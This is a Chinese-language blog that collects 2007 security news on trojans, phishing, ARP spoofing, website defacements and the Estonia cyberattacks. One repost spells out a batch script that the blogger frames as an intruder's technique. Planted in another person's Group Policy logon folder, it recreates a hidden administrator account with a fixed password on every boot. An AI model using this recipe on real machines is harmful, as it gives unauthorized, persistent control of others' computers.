 這就是殺毒引擎的“虛擬機器技術”,它的目的就是讓程式檔在沒有實際運行的情況下得到運行後的結果,最初虛擬機器技術是為了對付變形病毒而產生的,因為變形病毒會將自身代碼以一定的方式進行多次變換,這樣傳統靜態特徵碼掃描技術就對其無能為力,因為它根本無法確認特徵碼。

但是即使再強悍的變形病毒也不可避免在運行時出現一段相對固定的機器碼,否則它自身也無法正常運行完成變形過程,而由於這段機器碼只有在運行時才能被捕獲到,因此工程師開發了“虛擬機器技術”誘使病毒在殺毒引擎產生的“CPU”裡盡情運行,而後根據其固定機器碼匹配病毒碼資料庫中的靜態特徵來判斷這個程式是否病毒。雖然這個技術可能會導致誤報,但是仍不能否認其是一種有效的方法。

 2.即時監控技術

即時監控技術,說白了其實就是一個檔監視器,它會在檔打開、關閉、修改等操作時將其攔截並送入查毒模組進行分析,而在如今的作業系統中要實現對所有檔操作的攔截並非易事,這需要涉及系統核心,因此,這裡所採取的方案原型,就是“軟體驅動”。通過驅動進入核心,便能獲知每個檔的操作情況並做出反應了。

這項技術的難度在於驅動代碼的編寫,由於內核沒有異常處理過程,在這裡執行的代碼稍有一點錯漏都能直接導致系統崩潰,且驅動與用戶層的即時交互也需要一套複雜的實現方案,因此只有一定實力的廠家才實現這項技術,且實現了這項技術的廠家大部分都會連同虛擬機器技術、靜態特徵碼掃描技術一起結合起來,最終形成自己的產品。

. 結語

許多使用者都在挑選殺毒軟體時犯難,實際上,如果拋開許多表面上的東西,殺毒軟體的引擎實現技術也就那麼幾個,關鍵在於殺毒廠商的研發能力和實際工作效率,也不能只憑殺毒軟體在對付某種病毒的差別上就斷定它們之間的地位差異。符合自己使用的,就是最好的。

jason0936 發表在 痞客邦 留言(0) 人氣()

中國網路發佈--網上炒股需小心 股民安全八大注意

2007062514:31 來源:人民網   

近日,由於股票市場的持續火爆,使得越來越多的新股民進入股市。據有關部門統計,目前每13個中國人就有1個炒股、每天A股開戶數新增30萬戶,我國已進入“全民皆股”時代。而網上炒股以其“交易方便快捷、信息量大,緊跟行情、輔助分析系統強大”等特點成為股民炒股的首選方式。

但據專家介紹,由於大多數股民缺乏基本的防護意識和措施,使網上炒股面臨極大的安全風險。

  瑞星安全專家介紹,這些安全性漏洞主要存在於用戶自己的電腦中,銀行、證券公司的系統相對要安全一些,而駭客往往採取以下幾種手段來攻擊用戶。

  一、網上詐騙(又稱網路釣魚)
 
  所謂“網上詐騙”,就是駭客實現建立一個與正常網站幾乎一模一樣的假冒網站,同時申請一個與正常網站相近的功能變數名稱。當用戶輸入錯網址後,就會被引入到這個虛假的網站。一旦用戶在這個假網站中輸入自己的帳號、密碼,這些資訊就會被駭客竊取。

  同時,一些病毒感染使用者電腦後也會彈出假冒的視窗,引誘使用者輸入隱私資訊,達到相同的目的。
 

  二、採用病毒、木馬攻擊
  
2006年,瑞星共截獲新病毒23萬之多,其中約90%的病毒是以直接或者間接獲取經濟利益為目的編寫的,其中則有大量針對網路銀行、網上證券系統編寫的病毒。

  這類病毒的基本原則是“只偷竊不破壞”,因此有著很大的隱蔽性。使用者的電腦感染這類病毒後,沒有明顯的發作特徵,使用者幾乎察覺不到被病毒感染,而這些病毒則在後臺悄悄地運行,當使用者登錄網路銀行、證券系統時自動記錄輸入的資訊,並將這些資訊發送給駭客。

  三、猜解密碼
  很多使用者的密碼設置的非常簡單,採用“
123456”或者用生日做為密碼的大有人在。還有一些使用者害怕忘記密碼,而將它們寫在Word文檔中,任何人只要使用其電腦 就可以看到他的密碼。這些都給駭客的攻擊帶來便利。

  對此,瑞星安全專家提出了“網上炒股的八大注意事項”:

  第一、必須安裝殺毒軟體並且做到每天至少升級一次
  目前,瑞星每天截獲的新病毒數量成百上千。為了對付這些新增病毒,瑞星殺毒軟
件每天常規升級三次。使用者只有及時升級殺毒軟體才能有效查殺這些新增的病毒,因此, 安全專家建議用戶每天至少升級一次殺毒軟體。

   第二、必須打開殺毒軟體的即時監控和個人防火牆
  一些用戶由於缺乏必要的安全防護知識,在遇到殺毒軟體發現病毒攻擊時往往不知
所措,還有一些使用者覺得殺毒軟體和防火牆的經常彈出提示資訊比較麻煩,乾脆將它們 關閉。這些都給駭客的攻擊帶來了便利。 

  第三、安裝卡卡上網安全助手
     (這似乎是廣告)

  用戶可以在瑞星的卡卡網站(
http://tool.ikaka.com)免費下載使用該軟體。卡卡助手具有防範網路詐騙的功能,當用戶不小心打開假冒的網路銀行、網上證券網站時會自動進行攔截並提示用戶。同時,卡卡獨家的“IE防漏牆”模組還可以阻止絕大部分病毒通過流覽器漏洞侵入使用者的電腦。

  第四、使用帶有USB KEY的網路銀行專業版進行交易
        (AV病毒就是靠USB,所以USB最近不安全管道)

  通常,網路銀行專業版在安全特性上要比基於流覽器的簡易版網路銀行高,因此建議使用者安裝專業版本的網路銀行系統進行交易。新使用者儘量使用帶有
USB KEY加密的硬體專業版,這種專業版會由硬體生成金鑰,並且金鑰無法複製出USB硬體,從而大大提高了安全程度,如招商銀行的“優key”、工商銀行的“USB KEY”等。

  第五、到證券公司的官方網站下載炒股軟體
      (也要確認官方網站是否為真正官方站/或是有被入侵的訊息 )

  一些不正規網站上的炒股軟體存在被駭客攻擊,放入病毒、木馬的風險,因此,使用者在使用炒股軟體時一定要從國泰君安、中信證券等的官方網站下載。

  第六、充分利用瑞星個人防火牆的“密碼保護”功能
     (這還是是廣告)
  瑞星獨有的“木馬牆”技術可以阻止病毒、木馬竊取使用者網上銀行、網上證券軟體的帳號和密碼,即使使用者電腦上感染了新的未知病毒,也同樣能夠起到保護作用。該技術應用在瑞星個人防火牆的“密碼保護”模組中,使用者安裝個人防火牆之後,直接將網上銀行、證券軟體的快捷方式添加到“密碼保護”中即可。

  第七、設置較為複雜的密碼
  簡單的密碼容易被駭客破解,因此建議股民朋友不要使用生日、電話號碼、門牌號或類似“
123456”等帶有明顯規律的密碼。同時,股票帳戶和銀證通帳戶的密碼不要保存在電腦上。

  第八、儘量不要在網吧等公共電腦上炒股
  由於公共電腦的安全防範措施不高,往往會存在病毒、木馬,這都給網上炒股帶來風險。如果必須使用此類電腦,則在進行網上交易前必須先對電腦進行查毒,同時,在完成交易後一定要退出交易系統,以免造成股票和帳戶資金損失。

jason0936 發表在 痞客邦 留言(0) 人氣()

http://tech.china.com/zh_cn/news/safe/895/20070625/14181197.html&cid=1113992134&ei=54t_Rp-jK4PCqgOFtewm
AV終結者引發木馬氾濫 反木馬行動迫在眉睫
2007-06-25 16:23:48

    近日,關於“AV終結者”病毒的討伐聲不斷,大量使用者深受該病毒的侵害。昨日,金山毒霸反病毒專家再次指出:“AV終結者”的危害才剛剛開始。反病毒專家戴光劍表示,這個被稱為史上最牛的木馬下載器的“AV終結者”病毒,其最大的危害並非病毒本身,而是引發了新一輪木馬病毒的氾濫。
    
    據悉,“AV終結者”病毒已經在互聯網上肆虐數日,然而由於該病毒的隱蔽性極高,大量使用者甚至感染了該病毒也毫無察覺。而使用者電腦的安全系統就是在不知不覺中被徹底破壞,電腦完全處於“裸奔”狀態,而此時面對大量魚貫而來的木馬病毒,使用者的電腦已經失去了任何“抵抗力”。
    
    使用者劉先生有玩網路遊戲的習慣,每天下班後都會玩上2個小時。“昨天我剛剛的登陸到遊戲,發現自己辛苦贏回來的遊戲裝備全部不翼而飛,裡面還包含了一些價值萬元的高級裝備。”而後,劉先生企圖通過QQ向好友求助,結果發現連QQ也無法登陸。
    
    根據劉先生的描述,金山毒霸反病毒工程師們的第一反應就是劉先生的電腦被植入了木馬病毒。然而經過進一步查看,發現劉先生電腦內的殺毒軟體根本就沒有被開啟,也就是說劉先生的電腦完全是一台“裸機”,此種現象引發的工程師的高度重視,經過仔細分析,“AV終結者”病毒浮出水面。
    
    為了説明劉先生清除電腦內的病毒,金山毒霸反病毒工程師首先在一台正常的機器上登陸www.duba.net下載了一個“AV終結者”專殺工具,而後通過U盤連接到劉先生的機器上,幾分鐘後,“AV終結者”被清除。工程師重新開機殺毒軟體進行全面查毒,結果查殺結果讓劉先生瞠目結舌,竟然在自己的電腦內查出68個木馬病毒。
    
    金山毒霸反病毒專家戴光劍表示,“經濟利益”毫無疑問已經成為病毒製造者最大的驅動力,而木馬正是實現這一非法得利的主要手段。在06年截獲的各類病毒中,專門盜取網銀、網遊等網路財產和QQ號的木馬占了51%,這類病毒相對去年有明顯增長,已經成為眾多線民面臨的第一大威脅。
    
    業內人士指出,病毒製造者已經不再是以炫耀自己的技術為目的,也不再是單打獨鬥,而是結成了團夥,有的人負責盜取銀行或網遊帳號,有的人負責銷贓,從而形成了一整條的黑色產業鏈,如果任期發展下去,整個互聯網安全將面臨嚴峻威脅,因此反木馬已經成為各大反病毒廠商的首要任務。

jason0936 發表在 痞客邦 留言(0) 人氣()

想取得資訊何其容易,本日中國紅網新聞中就教授大家「如何建立一個,不被殺掉,並擁有最大管理者權限帳號」這其實也是當惡意人士基礎入侵後,第一件要作或是嘗試要作的事,就是取得本地端權限,往往可以透過很多方法,最常見的就是以郵件或是各種可供程式啟動弱點,讓受害者不知情下作這件事情(莫名其妙就被人建立最大管理者),以下為本文(沒有打馬賽克是因為本文章為尊重新聞來源,但請勿以以下程序作非法用途,)

 

http://tech.rednet.cn/c/2007/06/25/1238379.htm

別人永遠刪不掉 建立管理員用戶小竅門

http://www.rednet.cn  2007-6-25 9:50:08  紅網 

操作步驟:

1、在自己電腦裡面建立一個.txt文字檔.

2、在裡面輸入內容

@echo off

net user xixi 123456 /add

net localgroup administrators xixi /add

        (注釋:前面xixi是用戶名,後面123456是密碼;)

3、把這個檔保存,更改尾碼為xixi.bat 注釋:前面名字隨便,後面格式一定要是bat

4、把這個檔拷貝到對方電腦C:\WINNT\system32\GroupPolicy\User\Scripts\Logon檔目錄下,沒有的話自己創建。

完成,下次對方電腦無論如何都有這個管理員帳號,刪除了,下次啟動還有!

 

如果把裡面的內容改成

@echo off

net user administrator 123456 /add

意思是不管你怎麼改,下次啟動管理員帳號administrator密碼一直是123456

[稿源:賽迪網]

[作者:smtk]

[編輯:龔鎮威]

jason0936 發表在 痞客邦 留言(0) 人氣()

美軍方表態Google Earth威脅安全
http://www.sina.com.cn 2007年06月24日 09:36  賽迪網

【賽迪網訊】6月24日消息,據國外媒體報導,美國空軍情報、監察與測繪(AF ISR)部門副參謀長Lt. Gen. David Deptula日前表示,Google Earth等網路地圖軟體已經對安全構成了威脅。

  Deptula稱,Google Earth等網路地圖軟體所提供的資料已經對安全構成了威脅。他說:“現在談威脅已經沒有什麼意義了,因為它已經的的確確存在了。而且,也沒有人想撤回這些商業微星圖片。”

  Deptula說:“一個人,只要拿著一張信用卡,就可以在地球的任何一個角落獲得所需要的圖片,這是非常害怕的。對於以前由重兵把守的秘密場所,現在每個人都通過網路來訪問。”

  當被問及“美國軍方是否將對某些軍事重地的圖片進行限制”時,Deptula稱並不瞭解這方面情況。不久前,Google Earth剛剛推出了“街道流覽”功能,允許用戶360度流覽某一特定場所。據悉,該服務連 蘋果CEO史蒂夫•約伯斯的房間都看得一清二楚。

jason0936 發表在 痞客邦 留言(0) 人氣()

http://news.sina.com.tw/tech/sinacn/cn/2007-06-24/163538170315.shtml
ARP位址欺騙病毒出現新變種
北京新浪網 (2007-06-24 16:35)
 
  新華網天津6月24日電 (記者 張建新 薛飛) 國家電腦病毒應急處理中心24日預報說,6月25日至7月1日一周內將要定期發作的電腦病毒都沒有大的影響。但近期一些局域網用戶遭受了『ARP位址欺騙』病毒新變種的感染。

  據介紹,該病毒變種除具備以往ARP病毒發作的特徵,如局域網內部分電腦不能正常上網,或是所有電腦均不能上網,還有無法打開Web網頁或打開Web網頁速度較慢以及局域網鏈結時斷時續並且網速較慢等現象以外,還會向局域網內發送偽造的ARP欺騙廣播,並將受感染的電腦系統偽裝成局域網閘道。當局域網中的電腦系統發出訪問Web網頁請求的時候,偽裝成閘道的電腦系統會把Web網頁下載下來並在其中添加一段惡意位址代碼一並發送給發出請求的電腦,造成該電腦系統訪問Web網站時會主動鏈結該惡意網址。

  如果作業系統存在漏洞,就會在訪問的電腦系統中植入木馬程式,使得電腦系統遭到進一步的破壞,最終導致整個局域網成為『殭尸網路』。

  國家電腦病毒應急處理中心建議廣大電腦用戶採取如下針對性防範措施:

  1、立即升級作業系統中的防病毒軟件和防火牆,同時打開『即時監控』功能,即時地攔截來自局域網路上的各種ARP病毒變種。

  2、立即下載微軟MS06-014和MS07-017兩個系統漏洞補丁程式,將補丁程式安裝到局域網路中存在這兩個漏洞的電腦系統中,防止病毒變種的感染和傳播。

jason0936 發表在 痞客邦 留言(0) 人氣()

隱私權保護組織:行動通訊裝置易遭窺探私密

更新日期:2007/06/24 14:05 記者:郭無患

(法新社舊金山二十三日電) 維護隱私權人士警告指出,改變以手持行動通訊裝置收發電子郵件、打電話、以及搜尋網路資料,等於是為私家偵探和間諜創造了一個挖掘不盡的全球大金礦。

法國「世界報」報導,法國政府官員被建議不要使用「黑莓機」,因為美國國家安全局可能會從電子郵件中截取情報。

美國電子資料保密中心資深顧問恩古告訴法新社:「一個政府能說無線資料不太安全,使用時要格外小心,這是很好的事」。

恩古指出:「大家必須對此有所了解,我們知道多個政府機構,像是聯邦調查局,都曾未獲法院授權就尋搜情報,而國安局更表示無需核准」。

黑莓機製造廠商加拿大無線通訊公司(ResearchIn Motion)駁斥法國政府的擔心是無必要的反應,並表示,指稱美國間諜能窺探其網路是「有兩年之久,老掉牙的謠言」。

加拿大無線通訊公司表示:「沒有人,包括加拿大無線通訊公司本身也一樣,有能力檢視以黑莓機發送的任何數據資料,因為所有數據都是加密的」。

「電子郵件來源不能被追蹤,內容也無法分析」。

根據加拿大無線通訊公司的資料,全球大約有七十萬名政府人員使用黑莓機。

歐洲國家官員長久以來懷疑美國領導一項代號「梯隊」的計畫,這項計畫於冷戰時設立,目的在攔截並還原電子訊息,但在共產鐵幕崩解後,這項計畫就被用來窺探歐洲國家情報。

加拿大無線通訊公司駁斥相關說法為「不實和誤導」;但隱私權保護人士和駭客高手認為,隨著科技和時間演進,無線傳輸訊息被攔截破解,只是早晚的事。

jason0936 發表在 痞客邦 留言(0) 人氣()

防範惡意程式入侵 網站管理加倍小心

http://www.bcc.com.tw

更新日期:2007/06/23 09:00
「防範惡意程式入侵 網站管理加倍小心」(張德厚報導)

調查報告顯示,台灣網路上惡意程式氾濫,平均每天就發生5件網路駭客入侵事件,台灣已經成為亞洲最毒國家的第二名,僅次於中國大陸。資訊安全公司Tipping Point與法務部調查局、刑事局等單位,共同針對國內網路安全進行觀察,發現從2000年開始,藉由台灣網域「.com.tw」而發生的駭客攻擊超過12,000次,平均每天就發生5件。駭客入侵的對象包含企業網站、政府網站以及教育單位;觀察也發現,從過濾器中所發現的病毒,在今年的一月初,更發生一天有超過一百萬的數量。駭客的攻擊手法,已經不像以往用病毒來大規模癱瘓全球的電腦,而開始針對特定的行業或對象來進行入侵。例如銀行、保險、證券等金融業的網站,都經常成為駭客入侵的對象,即使是一般網站,許多也暗藏木馬程式,台灣網路已經成為亞洲最毒國家的第二名,僅次於中國大陸。法務部調查局資安鑑識科調查員錢世傑:『這幾年比較嚴重的情況是,木馬程式比較氾濫,透過木馬程式的散布,所以在國內的很多電腦中都被植入傀儡,也就是這些電腦都可以被操控在駭客及犯罪集團的手中。』

◎資安危機 網頁惡意連結最嚴重資安公司進一步指出,台灣90%的銀行都曾經被駭客以各種方式入侵過,可見得資安問題的嚴重性。不過許多企業由於預算的關係,即使被駭客入侵過,但是還是不願意投資防護設備與人力,甚至還有單一企業被駭客入侵高達82次的紀錄。錢世傑:『譬如駭客會用一種手法叫SQL Injection,他是先入侵資料庫,然後透過資料庫去變更你網頁的內容,很多大陸的駭客很容易就入侵資料庫,透過一個程式很容易就把你的網頁改過來了,改過之後你的網頁也變成了釣魚網站,任何來到你的網頁瀏覽的民眾,很可能就經由你的網頁再連到一些惡意網頁被植入木馬。』這些被入侵竄改的網頁,在外觀上完全看不出有什麼不同,使用者以為在瀏覽一般正常的網站,沒想到不知不覺就暗中被連結到另一個惡意網頁而被植入木馬程式,個人帳戶密碼等機資料也因此被竊取取;因為木馬程式特徵會一再變化,一般的防毒軟體能夠預防的效果也有限。

◎阻止惡意程式 Google提出警示而為防止網友瀏覽網頁時暗中被植入惡意程式,搜尋引擎Google就對潛藏惡意程式的網站標示警語,提醒網友不要進入。經常上網的網友可能會發現,使用搜尋引擎Google找資料時,有些搜尋結果所列出的網站下面,會出現一行警語寫到「這個網站可能會損害您的電腦」,這其實是由Google的「阻止惡意程式組織」(StopBadware.org)所提供的惡意程式提醒服務。根據Google的統計,全球至少有100萬個網頁含有會「隱匿強迫下載」的惡意程式。而Google發現被惡意程式入侵的網站,就會在搜尋結果中標示警語,並封鎖連結,若網友強制點選進入,Google會警告「風險需自行承擔」。而對於遭入侵的網站,Google也提供了通知的服務,只要網站使用Google的「網站管理員工具」,提報網站的網址給Google,一旦網站遭受惡意程式攻擊時,Google就會透過電子郵件通知網站管理員,並且做出如何解決的建議。而如果網站本身已經移除了入侵的惡意程式,也可以通知Google要求移除警示。

◎拒絕惡意程式 網站加強維護除了被動的仰賴搜尋引擎所提供的警示,網站的管理者又該如何主動的預防惡意程式攻擊呢?資安公司表示,駭客之所以能入侵網站,通常都是網站的伺服器設定上出現漏洞,或是修補程式沒有安裝,使得駭客入侵取得了控制權限,進而竄改網頁、加入惡意連結。由於駭客不希望任何人發現他已經入侵成功了,所以網站在運作及外觀上不會出現任何變化,但是卻會導引網友到其它地方下載惡意程式。

資安公司指出,網站管理者平時在進行維護工作時,必須要加留意是否出現漏洞,仔細檢查是否有不該存在的對外連結,才能及早發現是否有惡意程式植入。賽門鐵克技術總監王岳忠:『檢查的時候,不能只看網頁該有的東西通通有就好了,要去檢查網頁是不是有一些多的、不該有的,除了看網頁顯示出來的結果之外,還要去看看網站是否被竄改。』而在預防方面,王岳忠指出,任何防毒措施,都是在攻擊出來之後,才會有相對的解決方案,期間還是可能讓駭客有可趁之機,由於網站用的伺服器其實工作項目很單純,最好的防護方法,建議可以「鎖定」的方式進行主機系統防護,網站的安全就可以大幅提高。

王岳忠:『你去列出來,這台伺服器,他能做哪些事情,只要不是我允許的事情,全部不能做,這個方法會遠比要用最新的防護,隨時更新要有效。』

jason0936 發表在 痞客邦 留言(0) 人氣()

http://news.sina.com.tw/tech/sinacn/cn/2007-06-22/132038170168.shtml
美國司法部文件洩露XP SP3部分技術細節

北京新浪網 (2007-06-22 13:20)

作者:BlackWing

 又有消息證實了Windows XP SP3的存在,並且微軟也透露了部分SP3將包含哪些更新的細節。對於微軟來說,Windows XP SP3已經不是新聞。並且,隨著Vista的正式推出,Windows XP SP3已經退居幕後。但微軟一直都沒公開證實是否取消Windows XP SP3。

  在美國司法部的法律訴訟案中透露了Vista SP1(Vista SP1)的推出日期。案中顯示微軟計劃在今年年底推出Vista SP1 beta,但目前這個也只是初步估計的日期。與Vista不同,現在Windows XP SP3計劃會在2008年上半年推出。但是微軟原本計劃在2006年就會推出Windows XP SP3,後來宣布延遲到2007,接著再度延遲到2008。

  雖然幾經推遲,Windows XP SP3還是會推出,並且微軟計劃在這個升級中集成IE和Windows Media Player的修改。從美國司法部的文件中得知,微軟已經同意對Windows XP作出修改,修改的方麵包括兩個中間u馦ㄚ~和Windows Live Messenger。Windows Live Messenger的改變已經體現在Windows Live Messenger 8.5 beta中,並且將會集成到公開發布版本中。而IE和Windows Media Player的改變也會在2007年8月提供給用戶,並且微軟正和TC討論如何投遞這些修改版本。有關Windows XP的改動將會整合到Windows XP SP3當中。

jason0936 發表在 痞客邦 留言(0) 人氣()

這..... 嗯........看看吧
http://news.sina.com.tw/tech/sinacn/cn/2007-06-22/160538170213.shtml
微軟:Vista比MacOS X和Linux更安全

北京新浪網 (2007-06-22 16:05)

  [計世網消息](伯牙 編譯) 6月22日消息,國外媒體報導,微軟日前表示,Windows Vista的漏洞遠遠少于Linux和Mac OS X系統。

  微軟安全業務部門可信賴戰略主管傑夫‧瓊斯日前表示,與Linux和Mac OS X等作業系統相比,Windows Vista的安全性要高出很多。

  據悉,瓊斯對Windows Vista、Windows XP、Red Hat Enterprise Linux 4 、Ubuntu 6.06 LTS、Novell Suse Linux Enterprise Desktop 10和Apple OS X等系統進行了比較,結果發現,Vista幾乎在所有領域都要領先于其他系統。

  在安全漏洞的修補效率方面,微軟比蘋果快159%,比 Novell快255%,比 Sun快579%。

  在風險日方面,Windows去年的平均風險日為29天,而Mac OS X為46 天、SuSE Linux Enterprise為 74天,紅帽子企業Linux為107天,Sun Solaris為 168天。

  對此,賽門鐵克安全回應部門副總工程師阿爾夫雷德‧胡根表示,瓊斯的統計數字比較合理。胡根說:『我們最近的一次互聯網安全威脅報告與瓊斯的資料基本一致』。

jason0936 發表在 痞客邦 留言(0) 人氣()

《生活萬象》又見惡意程式 鑽IE漏洞

更新日期:2007/06/22 09:17 記者:【陳大任】

一隻名為JS_DLOADER.NTJ的惡意程式最近在歐洲造成嚴重災情,單日最高記錄造成六萬台電腦遭殃,單是義大利就有四萬四千台電腦被入侵的惡意程式攻擊發出警訊。

趨勢科技技術顧問簡勝財說,駭客挑選安全防護較不完整的網站,並且植入惡意連結程式HTML_iFrame.CU,當做是擴散的跳板,只要網友點選此網站,電腦即會被連結到另一個IP位址,並植入名為JS_DLOADER.NTJ的惡意程式。此隻惡意程式會利用微軟IE中的MS04-040及MS06-057漏洞入侵電腦,以植入更多可竊取個人機密資料的木馬程式,此被入侵的電腦將被開啟後門,成為駭客散播惡意程式的工具,藉以造成更大規模的感染。

jason0936 發表在 痞客邦 留言(0) 人氣()

駭客入侵! 自由時報首頁變五星旗

http://www.tvbs.com.tw/index/

更新日期:2007/06/18 18:45 記者:古彩彥

大陸的網路駭客最近放話,要向泛綠的網站宣戰,結果自由時報網站,今天凌晨,就遭到駭客入侵,首頁變成了五星旗的畫面,自由時報發現之後緊急更正,被入侵的時間大約維持了20分鐘。

凌晨2點多,連接上自由時報的網頁,一按下去,看到的竟然是這個畫面,大大的五星旗佔據整個螢幕,下面還有一行小字「日本人與狗、台獨、分裂國家的不得入內」。
原來大陸駭客入侵自由時報,放話要向台獨份子宣戰,駭客還把入侵的過程放在自己的部落格上,寫到此一遊,甚至留言打倒陳水扁,反對台獨;仔細比對駭客入侵的網址,的確是自由時報的首頁沒有錯。

事件發生之後,自由時報馬上請電腦組更正,強調駭客入侵的時間,大概只有10到20分鐘,事實上最近已經有許多大陸網友放話,要向台灣的親綠網站宣戰,被被網友視為親綠媒體的自由時報首當其衝,恐怕還有其他網站可能會遭殃。

jason0936 發表在 痞客邦 留言(0) 人氣()

http://tw.news.yahoo.com/article/url/d/a/070606/17/ff2p.html
請小心!Google統計:全台共984個網站 被植入惡意程式
東森新聞報 新日期:2007/06/06 15:22 記者:科技中心/綜合報導

正在看這則新聞的民眾請小心了,根據google統計,全台有984個網站被植入惡意程式碼,其中包括知名車廠,南港軟體園區和投保中心,網友如果點入,可能會導致電腦中毒,或私人資料被竊取。

根據google最新統計,全台有984個網站被植入惡意程式碼,其中不乏知名汽車商家和電視台網站,甚至學術機構和商業網站。

因此,民眾上google搜尋政大網站,會得到一個警告畫面,再點選進去,會發現網站連結被封鎖,如果搜尋投保中心,還有南港軟體工業園區,都會出現相同的結果。

不過,可能也有些是例外的,像是南港軟體園區證實的確上月初就發現,該網站遭到惡意程式植入。

不過,業者許先生則說:「有跟google申請,告知網站已正常。」 現在,當使用者搜尋到有問題網站時,Google會主動出現,「這個網站可能侵害電腦」的字樣,並封鎖連結,如果強制進入,還會有風險自付的警告,網友們搜尋網站得小心為妙。

jason0936 發表在 痞客邦 留言(0) 人氣()

網路戰爭首例 愛沙尼亞網路疑遭俄國癱瘓 
CNET新聞專區:授權使用NYTimes文章/Steven Lee Myers  21/05/2007

愛沙尼亞政府官員證實,該國已成為網路戰爭的第一個受害者。
這一起顯然發自俄羅斯的電腦網路攻擊,首先在427日愛沙尼亞發生暴力示威時,癱瘓該國總理的網站,總統、內閣各部會的網站隨後也淪陷關閉。  

接下來的數波攻擊依序鎖定愛沙尼亞的報紙、電視台、學校,最後是銀行,引發經濟損害的恐慌。所幸之後攻擊逐漸轉弱,而後停止。愛沙尼亞國防部發言人Madis Mikko表示:「假設有飛彈攻擊你的機場,這就是戰爭行為。如果同樣的結果是由電腦造成,(除了戰爭之外)你還能稱這種攻擊是什麼?」

愛沙尼亞官員不論在公開或私下,皆指控俄羅斯在背後操控整起攻擊。14日舉行的北約(NATO)會議,愛沙尼亞國防部長Jaak Aaviksoo即要求盟國緊急討論大規模電腦攻擊對國家安全造成的威脅。北約發言人Robert Pszczel說:「大家都相當重視這類事件。今天遭殃的是愛沙尼亞,明天可能是任何國家。」  

克宮則是不斷否認官方涉入這起攻擊,反控愛沙尼亞憑空捏造。但包括總理Andrus Ansip 在內的愛沙尼亞官員,都曾表示追蹤到攻擊源頭出自俄羅斯的電腦伺服器,包括由俄國政府和總統普丁內閣註冊的網域。

僅管愛沙尼亞政府發言人Martin Jasko 認為攻擊的時機和目標都構成合理的懷疑,這些電腦仍可能被第三方使用,因此很難證明俄國政府的涉入。近月來,俄羅斯與愛沙尼亞兩國因為是否移除蘇聯時代的戰爭紀念碑陷入爭端,俄國指責愛沙尼亞糟蹋過去蘇聯士兵抵擋納粹入侵的歷史記憶。  

網路攻擊在愛沙尼亞決定移除紀念碑當天爆發,之後數天,俄國以修繕軌道之名,暫停兩國間的鐵路交通。莫斯科則在同時發生大規模的示威抗議,愛沙尼亞大使甚至遭到羞辱,政府高層也呼籲抵制愛沙尼亞產品。

俄國與愛沙尼亞和波蘭、立陶宛等國的關係緊張,為總統普丁18日在南俄與歐盟各國元首舉行的高峰會蒙上一層陰影。歐盟代表Taneli Lahti 透露,會中確有討論俄羅斯與愛沙尼亞的關係,但不包括網路攻擊事件。

愛沙尼亞官員聲稱這是該國至今遭遇最大規模的網路攻擊。曾在攻打塞爾維亞期間受到類似攻擊的北約,已派遣一位電腦專家前往當地協助調查。化為數波的攻擊,僅用幾小時時間,便癱瘓愛沙尼亞各個重要的政商網站。國防部發言人Mikko表示,官方網站每日的平均訪客約1,000人次,攻擊當時每秒就湧入2,000次要求。

攻擊的第一次高峰出現在53日,當天莫斯科爆發最激烈的示威抗議。另一次高峰是58日和9日,配合歐洲各國紀念戰勝納粹德國。但對許多愛沙尼亞國民而言,二戰勝利卻是長達半世紀蘇聯統治的開始,紀念碑正是其象徵。最後一波攻擊高峰是15日,該國最大的幾家銀行被迫暫停國外連線。

愛沙尼亞新成立的電腦緊急事件應變小組(Computer Emergency Response Team)首長Hillar Aarelaid說,隨著攻擊持續,來源似乎指向全球各地的電腦,包括越南和美國。他認為這些攻擊可能利用疆屍網路,網路上也流傳著俄國如何攻擊愛沙尼亞網站的指導說明,並建議繼續這次全球首見的網路戰爭。

Aarelaid說:「我們不敢說最大規模的攻擊已經過去,因為每一波都比前一波更大。」(陳智文/譯)

jason0936 發表在 痞客邦 留言(0) 人氣()

04/12/2007 - 12:51
政院網域遭攻擊 駭客來自內政部

軍方演習機密電腦資料疑遭駭客竊取之際,行政院網站上周也傳出接連兩天遭駭客攻擊,不過追查後發現駭客來自內政部記者室。內政部懷疑是媒體記者在不知電腦遭植入後門程式的情形下,連結行政院網站所致。
據了解,配合兵推,國安會抽測十行政部門安全管制,內政部也被抽中,上個月起,駐警在大廳拉起管制線、加強查驗出入人士,不料出現「內政部網路攻擊行政院網域」的意外狀況。
行政院昨天通知內政部,上周五、六網域連連遭駭客攻擊,經查發動攻擊的IP位址,恰在內政部記者室。初步調查,那兩天進出者僅一百一十二人,其中赴五樓(內政部記者室位在五樓)者十五人,但無人登記「媒體記者」

jason0936 發表在 痞客邦 留言(0) 人氣()